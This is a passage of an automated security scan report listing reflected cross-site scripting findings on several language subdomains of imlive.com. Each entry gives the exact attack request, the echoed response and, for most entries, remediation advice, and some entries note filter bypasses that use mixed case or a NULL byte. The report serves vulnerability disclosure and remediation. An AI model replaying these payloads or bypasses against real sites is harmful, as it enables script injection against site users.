2.153. http://jp.imlive.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jp.imlive.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bda08"><ScRiPt>alert(1)</ScRiPt>8bd9e847e0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request

GET /?bda08"><ScRiPt>alert(1)</ScRiPt>8bd9e847e0=1 HTTP/1.1
Host: jp.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=dbqosr45r1ekob55zrcmo3vs; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=dbqosr45r1ekob55zrcmo3vs; path=/; HttpOnly
Set-Cookie: spvdr=vd=df13fca7-243b-46a1-b685-4ed2e476c681&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:25:03 GMT; path=/
Set-Cookie: ijp=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:25:02 GMT
Connection: close
Content-Length: 20266
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ja-JP" lang="ja-JP" d
...[SNIP]...
<a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/uaccess/0/||bda08"><script>alert(1)</script>8bd9e847e0~1');return false;">
...[SNIP]...

2.154. http://mx.imlive.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mx.imlive.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9bb54'-alert(1)-'7c77be0c2b9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?9bb54'-alert(1)-'7c77be0c2b9=1 HTTP/1.1
Host: mx.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=af143dyttqznmg552yp4pnmv; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=af143dyttqznmg552yp4pnmv; path=/; HttpOnly
Set-Cookie: spvdr=vd=a7e3d806-3337-4a1b-9339-464061ff6408&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:25:17 GMT; path=/
Set-Cookie: imx=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:25:17 GMT
Connection: close
Content-Length: 19093
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es-MX" lang="es-MX" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815996&ud=0&pe=/homepage.aspx&he=mx.imlive.com&ul=/?9bb54'-alert(1)-'7c77be0c2b9=1&qs=9bb54'-alert(1)-'7c77be0c2b9=1&qs=9bb54'-alert(1)-'7c77be0c2b9=1&iy=dallas&id=44&iu=1&vd=a7e3d806-3337-4a1b-9339-464061ff6408';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attach
...[SNIP]...

2.155. http://mx.imlive.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://mx.imlive.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 601d8"><a>9322a6cdc6e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /?601d8"><a>9322a6cdc6e=1 HTTP/1.1
Host: mx.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=fvqwrzet5puogjqpwavrxj3x; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=fvqwrzet5puogjqpwavrxj3x; path=/; HttpOnly
Set-Cookie: spvdr=vd=79ce1b5f-ccb1-46f8-b915-4f1fe4dd4ae4&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:25:15 GMT; path=/
Set-Cookie: imx=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:25:14 GMT
Connection: close
Content-Length: 18918
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es-MX" lang="es-MX" d
...[SNIP]...
<a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/uaccess/0/||601d8"><a>9322a6cdc6e~1');return false;">
...[SNIP]...

2.156. http://nl.imlive.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://nl.imlive.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 54070'-alert(1)-'486543e8cd0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?54070'-alert(1)-'486543e8cd0=1 HTTP/1.1
Host: nl.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=c034ran2nxljb43o0d1er5my; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=c034ran2nxljb43o0d1er5my; path=/; HttpOnly
Set-Cookie: spvdr=vd=aac8efee-19e5-488d-a8b9-e4ac7d66bb67&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:25:16 GMT; path=/
Set-Cookie: inl=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:25:16 GMT
Connection: close
Content-Length: 18736
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="nl-NL" lang="nl-NL" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815903&ud=0&pe=/homepage.aspx&he=nl.imlive.com&ul=/?54070'-alert(1)-'486543e8cd0=1&qs=54070'-alert(1)-'486543e8cd0=1&qs=54070'-alert(1)-'486543e8cd0=1&iy=dallas&id=44&iu=1&vd=aac8efee-19e5-488d-a8b9-e4ac7d66bb67';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attach
...[SNIP]...

2.157. http://nl.imlive.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://nl.imlive.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b38ce"><ScRiPt>alert(1)</ScRiPt>70a1d0b675c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request

GET /?b38ce"><ScRiPt>alert(1)</ScRiPt>70a1d0b675c=1 HTTP/1.1
Host: nl.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=bkwd0p3ok5ihyg55ga3chv45; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=bkwd0p3ok5ihyg55ga3chv45; path=/; HttpOnly
Set-Cookie: spvdr=vd=3419e649-d6e5-4718-8e93-cb3b4fbfb4cb&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:25:16 GMT; path=/
Set-Cookie: inl=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:25:15 GMT
Connection: close
Content-Length: 19137
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="nl-NL" lang="nl-NL" d
...[SNIP]...
<a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/uaccess/0/||b38ce"><script>alert(1)</script>70a1d0b675c~1');return false;">
...[SNIP]...

2.158. http://nl.imlive.com/waccess/ [gotopage parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://nl.imlive.com
Path:   /waccess/

Issue detail

The value of the gotopage request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload abf97'onerror%3d'alert(1)'3747a08c954 was submitted in the gotopage parameter. This input was echoed as abf97'onerror='alert(1)'3747a08c954 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/abf97'onerror%3d'alert(1)'3747a08c954 HTTP/1.1
Host: nl.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:25:24 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ix=k; path=/
Set-Cookie: inl=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyIqvJvUlzC7C5ClUj1mImMy0aC%2BOSFmyeUpZNslxkObl7I0cWS0PuZU%2FREf%2ByHeMVk%3D; path=/
Set-Cookie: ASPSESSIONIDSQRTQDQC=PKPLFJMAFPAENFFGPJDEIIPJ; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:25:25 GMT
Connection: close
Content-Length: 8315
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<HTML>
<HEAD>
<meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5">
<title>ImLive.com - Page Not Found</title>

<link rel="stylesheet" type="text/css" href="http
...[SNIP]...
<img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=nl.imlive.com&ul=/webcam-login/abf97'onerror='alert(1)'3747a08c954/&lr=1107815903&ud=0&pe=404.asp&qs=404;http://nl.imlive.com:80/webcam-login/abf97'onerror='alert(1)'3747a08c954/&sr=0&id=0&iu=1' height='1' width='1'>
...[SNIP]...

2.159. http://no.imlive.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://no.imlive.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0019f9e"><script>alert(1)</script>4ba4bc172bb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 19f9e"><script>alert(1)</script>4ba4bc172bb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /?%0019f9e"><script>alert(1)</script>4ba4bc172bb=1 HTTP/1.1
Host: no.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=okhzdf55dmwfwo454ybn1y55; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=okhzdf55dmwfwo454ybn1y55; path=/; HttpOnly
Set-Cookie: spvdr=vd=156b6ee5-1005-4d39-882a-3bd71de99522&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:25:17 GMT; path=/
Set-Cookie: ino=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:25:16 GMT
Connection: close
Content-Length: 19351
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="nn-NO" lang="nn-NO" d
...[SNIP]...
<a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/uaccess/0/||%0019f9e"><script>alert(1)</script>4ba4bc172bb~1');return false;">
...[SNIP]...

2.160. http://no.imlive.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://no.imlive.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b0a13'-alert(1)-'2db01fc98e2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?b0a13'-alert(1)-'2db01fc98e2=1 HTTP/1.1
Host: no.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=dvipok55uqqpk5mzl2oh2bmd; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=dvipok55uqqpk5mzl2oh2bmd; path=/; HttpOnly
Set-Cookie: spvdr=vd=09b187c9-533d-4717-92f4-f93e601cfbd0&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:25:18 GMT; path=/
Set-Cookie: ino=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:25:17 GMT
Connection: close
Content-Length: 18872
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="nn-NO" lang="nn-NO" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815996&ud=0&pe=/homepage.aspx&he=no.imlive.com&ul=/?b0a13'-alert(1)-'2db01fc98e2=1&qs=b0a13'-alert(1)-'2db01fc98e2=1&qs=b0a13'-alert(1)-'2db01fc98e2=1&iy=dallas&id=44&iu=1&vd=09b187c9-533d-4717-92f4-f93e601cfbd0';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attach
...[SNIP]...

2.161. http://no.imlive.com/waccess/ [gotopage parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://no.imlive.com
Path:   /waccess/

Issue detail

The value of the gotopage request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload be3dc'onerror%3d'alert(1)'5045d73ef51 was submitted in the gotopage parameter. This input was echoed as be3dc'onerror='alert(1)'5045d73ef51 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/be3dc'onerror%3d'alert(1)'5045d73ef51 HTTP/1.1
Host: no.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:25:24 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ix=k; path=/
Set-Cookie: ino=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyIqvJvUlzC7C5ClUj1mImMy0aC%2BOSFmyeUpZNslxkObl7I0cWS0PuZU%2FREf%2ByHeMVk%3D; path=/
Set-Cookie: ASPSESSIONIDQQTQRCSD=FAOLDJMABFDNBFGJJENBGHOA; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:25:24 GMT
Connection: close
Content-Length: 8316
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<HTML>
<HEAD>
<meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5">
<title>ImLive.com - Page Not Found</title>

<link rel="stylesheet" type="text/css" href="http
...[SNIP]...
<img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=no.imlive.com&ul=/webcam-login/be3dc'onerror='alert(1)'5045d73ef51/&lr=1107815903&ud=0&pe=404.asp&qs=404;http://no.imlive.com:80/webcam-login/be3dc'onerror='alert(1)'5045d73ef51/&sr=0&id=0&iu=1' height='1' width='1'>
...[SNIP]...

2.162. http://pu.imlive.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://pu.imlive.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 46447"><script>alert(1)</script>ca3e148e25e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?46447"><script>alert(1)</script>ca3e148e25e=1 HTTP/1.1
Host: pu.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=gxuklwm2wc54o44500sn3n55; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=gxuklwm2wc54o44500sn3n55; path=/; HttpOnly
Set-Cookie: spvdr=vd=d5599b14-175a-410b-9d97-113f02fc9ecd&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:25:21 GMT; path=/
Set-Cookie: ipu=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:25:21 GMT
Connection: close
Content-Length: 21862
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="pa-IN" lang="pa-IN" d
...[SNIP]...
<a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/uaccess/0/||46447"><script>alert(1)</script>ca3e148e25e~1');return false;">
...[SNIP]...

2.163. http://pu.imlive.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://pu.imlive.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e39ce'-alert(1)-'10f765ebe49 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?e39ce'-alert(1)-'10f765ebe49=1 HTTP/1.1
Host: pu.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=2ix2kvm0dkimmd45cjweuero; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=2ix2kvm0dkimmd45cjweuero; path=/; HttpOnly
Set-Cookie: spvdr=vd=918cb142-ac05-44ff-b781-bebd10f67a21&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:25:22 GMT; path=/
Set-Cookie: ipu=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:25:21 GMT
Connection: close
Content-Length: 21461
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="pa-IN" lang="pa-IN" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815996&ud=0&pe=/homepage.aspx&he=pu.imlive.com&ul=/?e39ce'-alert(1)-'10f765ebe49=1&qs=e39ce'-alert(1)-'10f765ebe49=1&qs=e39ce'-alert(1)-'10f765ebe49=1&iy=dallas&id=44&iu=1&vd=918cb142-ac05-44ff-b781-bebd10f67a21';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attach
...[SNIP]...

2.164. http://ru.imlive.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ru.imlive.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e9277'-alert(1)-'48bfaebef6a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?e9277'-alert(1)-'48bfaebef6a=1 HTTP/1.1
Host: ru.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=wgqean55lrgsk5blfe2amn55; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=wgqean55lrgsk5blfe2amn55; path=/; HttpOnly
Set-Cookie: spvdr=vd=591f9b95-a40e-412c-8b3f-904dd62e2a06&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:25:23 GMT; path=/
Set-Cookie: iru=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:25:23 GMT
Connection: close
Content-Length: 21036
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ru-RU" lang="ru-RU" d
...[SNIP]...
